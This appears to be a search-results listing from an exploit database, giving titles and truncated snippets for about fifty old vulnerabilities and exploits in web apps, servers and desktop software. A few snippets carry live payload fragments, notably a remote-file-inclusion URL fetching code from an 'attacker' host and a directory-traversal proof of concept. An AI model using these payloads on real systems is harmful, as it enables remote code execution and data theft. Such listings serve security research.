56796 matches found
Novell Access Manager 3 Identity Server IssueInstant Parameter Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/21921/info Access Manager Identity Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary scri...
Tolis Group BRU 17.0 - Local Root Exploit (2)
No description provided by source...
MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerability
No description provided by source. --------------------------------------------------------------------------- MyPHP CMS = 0.3 domain Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team :...
ProMan <= 0.1.1 - Multiple File Include Vulnerability
No description provided by source. ProMan = 0.1.1 Multiple File Include Vulnerability Author: cr4wl3r cr4wl3r\x40linuxmail\x2Eorg Download: http://sourceforge.net/projects/pman/files/ RFI Code ?php if !$GET'page' include'info.php'; else include $GET'page'.'.php'; ? LFI Code...
Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1)
No description provided by source. source: http://www.securityfocus.com/bid/754/info A specially crafted packet can cause a denial of service on an NT 4.0 host, rendering local administration and network communication nearly unusable. This attack will crash the services executable, which in turn,...
CutePHP CuteNews 1.3 HTML Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8060/info CutePHP is prone to HTML injection attacks. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, user-supplied input to news posts are not sufficiently sanitized of...
AT Computing atsar_linux 1.4 File Manipulation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1048/info atsar is a linux load monitoring software package released under the GPL by AT Computing. atsadc is a setuid root binary that is included in the atsar package. atsadc is setuid because it obtains informatin via...
ProductCart 1.5/1.6/2.0 Custva.ASP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8103/info ProductCart has been reported prone to an SQL injection vulnerability that may be exploited to reveal information relating to the underlying database; other attacks may also be possible...
ImgPals Photo Host 1.0 - Admin Account Disactivation
No description provided by source. -=--------------------ADVISORY-------------------=- ImgPals Photo Host Version 1.0 STABLE Author: Corrado Liotta Aka CorryL [email protected] -=-----------------------------------------------=- -=+ Application: ImgPals Photo Host -=+ Version: 1.0 STABLE -=+...
Solaris 2.6/7.0/8 netpr Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/1200/info A buffer overrun exists in the 'netpr' program, part of the SUNWpcu LP package included with Solaris, from Sun Microsystems. Versions of netpr on Solaris 2.6 and 7, on both Sparc and x86 have been confirmed as...
Twilight WebServer 1.3.3 .0 GET Request Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8181/info It has been reported that Twilight WebServer may be prone to a remote buffer overflow vulnerability. The problem may be present due to a lack of bounds checking performed on incoming GET requests. Arbitrary code...
Left 4 Dead Stats 1.1 - SQL Injection Vulnerability
---------------------------------- Left 4 Dead Stats SQL Injection Vulnerability Author: Sora Contact: vhr95zw at hotmail dot com Website: http://greyhathackers.wordpress.com/ Google Dork: In your dreams, script kiddies. VULNERABILITY DESCRIPTION: Left 4 Dead Stats suffers from a remote SQL...
Oracle Application Server 9i Webcache Cache_dump_file Cross-Site Scripting Vulnerability
No description provided by source. source : http://www.securityfocus.com/bid/13421/info A remote cross-site scripting vulnerability affects the Oracle Application Server 9i Webcache administration console. This issue is due to a failure of the application to properly sanitize user-supplied input...
TIPS MailPost 5.1.1 Error Message Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/11598/info MailPost is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data and can allow an attacker to execute arbitrary HTML and scri...
Dros RFI Vulnerability
No description provided by source...
Openfire 3.x jabber:iq:auth 'passwd_change' Remote Password Change Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/34804/info Openfire is prone to a vulnerability that can permit an attacker to change the password of arbitrary users. Exploiting this issue can allow the attacker to gain unauthorized access to the affected application a...
bcoos 1.0.10 modules/mylinks/ratelink.php lid Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/26629/info The 'bcoos' program is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. These...
Get Tube All Versions SQL Injection Vulnerability
No description provided by source. ----------------------------------------------------------------------------------------- Get Tube 4.51 & All Versions SQL Injection Vulnerability ----------------------------------------------------------------------------------------- +Title Get Tube 4.51 & Al...
LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit
No description provided by source. !/usr/bin/perl LightNEasy sql/no-db = 2.2.x system config disclosure exploit by staker ------------------------------ mail: stakerathotmaildotit url: http://www.lightneasy.org ------------------------------ it works with magicquotesgpc=off short explanation:...
CMS Made Simple 1.2 - Remote Code Execution Vulnerability
No description provided by source. o bug /. . . . .-' -...-'/ o o , . o -...--.\ vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability author: [email protected] download: http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip dork: powered by CMS Made Simple version...
eggBlog <= 4.1.1 - Local Directory Transversal Exploit
No description provided by source. !/usr/bin/perl eggBlog = 4.1.1 Local Directory Transversal Exploit by Juri Gianni aka yeat - stakerathotmaildotit Visit http://zeroidentity.org Description ---------------------------------------------------- eggBlog contains one flaw that allows an attacker to...
Avira Secure Backup 1.0.0.1 Build 3616 (.reg) - Buffer Overflow
No description provided by source. RCE Security Advisory http://www.rcesecurity.com 1. ADVISORY INFORMATION ----------------------- Product: Avira Secure Backup Vendor URL: www.avira.com Type: Improper Restriction of Operations within the Bounds of a Memory Buffer CWE-119 Date found: 2013-10-30...
PrinceClan Chess Mambo Com <= 0.8 - Remote Inclusion Vulnerability
No description provided by source. pcchess Component - dork : index.php?option=compcchess - exploit : http://target/path/components/compcchess/include.pcchess.php?mosConfigabsolutepath=http://attacker/cmd.txt?&cmd=ls milw0rm.com 2006-07-24...
SSH2 3.0 Short Password Login Vulnerability
source: http://www.securityfocus.com/bid/3078/info An input validation error exists in version 3.0.0 of the SSH daemon sshd running on Unix platforms. It may be possible for remote users to log in to accounts for which there are two or less characters in the password field of the system password...
e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities
No description provided by source...
Snort 2.4.0 - 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...
PHP-Nuke 6.x/7.x Reviews Module order Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: PHP-Nuke is prone to multiple...
iMesh <= 7.1.0.x (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit
No description provided by source. !-- iMesh = 7.1.0.x IMWebControl Class IMWeb.dll 7.0.0.x remote heap exploit IE7/XP full patched by rgod, site: http://retrogod.altervista.org/ software site: http://www.imesh.com iMesh is a file sharing and online social network. It uses a proprietary,...
MP3-Nator Buffer Overflow (SEH - DEP BYPASS)
No description provided by source. Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil Ramli - mind1355atgmaildotcom Credit/Bug Found By: C4SS!0 G0M3S Software Link:...
AIM Triton 1.0.4 CSeq Buffer Overflow
No description provided by source. $Id: aimtritoncseq.rb 9525 2010-06-15 07:18:08Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of us...
zKup CMS 2.0 <= 2.3 - Remote Upload Exploit
No description provided by source. !/usr/bin/php ?php / Name: zKup CMS v2.0 = v2.3 0-day exploit upload Credits: Charles real F. charlesfolathotmail.fr Date: 03-08-2008 Conditions: PHP Version, magicquotesgpc=Off This exploit spawn a php uploader in your victim's server. Okay, you may need...
Thickbox Gallery 2 - (index.php ln) Local File Inclusion Vulnerability
No description provided by source. + Thickbox Gallery v2 Local File Inclusion Vulnerability + Discovered By SirGod + www.mortal-team.net + www.h4cky0u.org + Local File Inclusion PoC : http://127.0.0.1/path/index.php?ln=../../../../../../BOOTSECT.BAK%00 milw0rm.com 2009-04-27...
WHMCS 4.x & 5.x - Multiple Web Vulnerabilities
No description provided by source. Exploit Title: WHMCS v4.x & v5.x - Multiple Web Vulnerabilities Date: 2013-12-10 Exploit Author: ahwak2000 Vendor Homepage: http://whmcs.com/ Version: 4.x , 5.x Tested on: win 7 +------------------+ | Vulnerability | +------------------+ File :...
Lowest Unique Bid Auction - SQL Injection Vulnerabilities
No description provided by source. | \ | | | | / | | | | | | | | | | // \ \ / / | | | | | | |/ | ' \ \ \ / / | | | \ \ /\ V / | | || | || | | | | | | / || \| / /||,|||/|| || |/ || Lowest unique bid auction, SQLi Vulnerabilities Product Page:...
Upclient 5.0 b7 Command Line Argument Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7703/info upclient has been reported prone to a buffer overflow vulnerability when handling command line arguments of excessive length. It is possible for a local attacker to seize control of the vulnerable application an...
Counter Strike 2D <= 0.1.0.1 - Denial of Service Vulnerability
No description provided by source. / Counter Strike 2D DoS Affected versions: 0.1.0.1 and prior CS2D Developer: http://www.cs2d.com/ by Iman Karim [email protected] http://home.inf.fh-rhein-sieg.de/ikarim2s/ Written in Borland C++ Builder 6 20.09.2005 / include winsock.h...
RunCMS <= 1.6 - Local File Inclusion Vulnerability
No description provided by source. WwW.BugReport.ir AmnPardaz Security Research & Penetration Testing Group Title: RunCms Multiple Vulnerabilities Vendor: http://www.runcms.org/ Bugs: Local File Inclusion, Modules Authorization Weakness Vulnerable Version: RunCMS 1.6 Halloween, 1.5.x prior versio...
GLPI 0.83.8 - Multiple Vulnerabilities
No description provided by source...
Citrix MetaFrame Web Manager - 'login.asp' Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/27948/info Citrix MetaFrame Web Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in t...
Inteno DG301 - Command Injection
No description provided by source...
Web Group Communication Center (WGCC) <= 1.0.3 - SQL Injection Vuln
No description provided by source. Title : Web Group Communication Center XSS/SQL Multiple Remote Vulnerabilies Author : myvx Date : 13.05.2008 Application : Web Group Communication Center Version : = 1.0.3 PreRelease 1 Vendor : http://wgcc.de/ Download :...
Linux-HA Heartbeat <= 2.0.6 - Remote Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/19516/info Linux-HA Heartbeat is prone to a remote denial-of-service vulnerability. By successfully exploiting this issue, attackers can crash the master control process. This may result in the failure of services that...
Crafty Syntax Live Help 2.9.9 - Multiple Remote File Include Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/20711/info Crafty Syntax Live Help is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...
Invision Power Board Dragoran Portal Mod <= 1.3 - SQL Injection Exploit
No description provided by source. !/usr/bin/perl IPB Portal 1.3-Invision Power Board plugin Created By SkOd SED security Team , http://sed-team.be google: Portal 1.3 by Dragoran use IO::Socket; if @ARGV 3 print q IPB Portal 1.3 SQL injection Get Hash Exploit Tested on Invision Power Board 1.3.0...
PHPWebSite 0.x Image File Processing Remote Arbitrary PHP File Upload Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/12653/info phpWebSite is reported prone to a remote arbitrary PHP file upload vulnerability. The issue presents itself due to a lack of sanitization performed on image files that are uploaded when submitting an...
myPHPNuke 1.8.8 reviews.php letter Parameter XSS
No description provided by source. !/usr/bin/env python coding: utf-8 from urlparse import urljoin from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '80921' ssvid version = '1.0' author = 'Disorder' vulDate =...
Sambar Server 5.1 Sample Script Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/3885/info Sambar Server is a multi-threaded web server which will run on Microsoft Windows 9x/ME/NT/2000 operating systems. It is possible to cause a denial of service to Sambar Server by sending consecutive excessively...
Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC
No description provided by source. Soulseek 157 NS 13e & 156. Remote Peer Search Code Execution ============================================= - Release date: July 02, 2009 - Discovered by: Laurent Gaffié ; http://g-laurent.blogspot.com/ - Severity: critical...
Web Crossing Web Server 4.0/5.0 Component Remote Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9576/info The Web Crossing Web Server component has been reported prone to a remote denial of service vulnerability. It has been reported that the issue will present itself when the affected web server receives a maliciou...
TFTgallery 0.13 'album' Parameter Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/36833/info TFTgallery is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in th...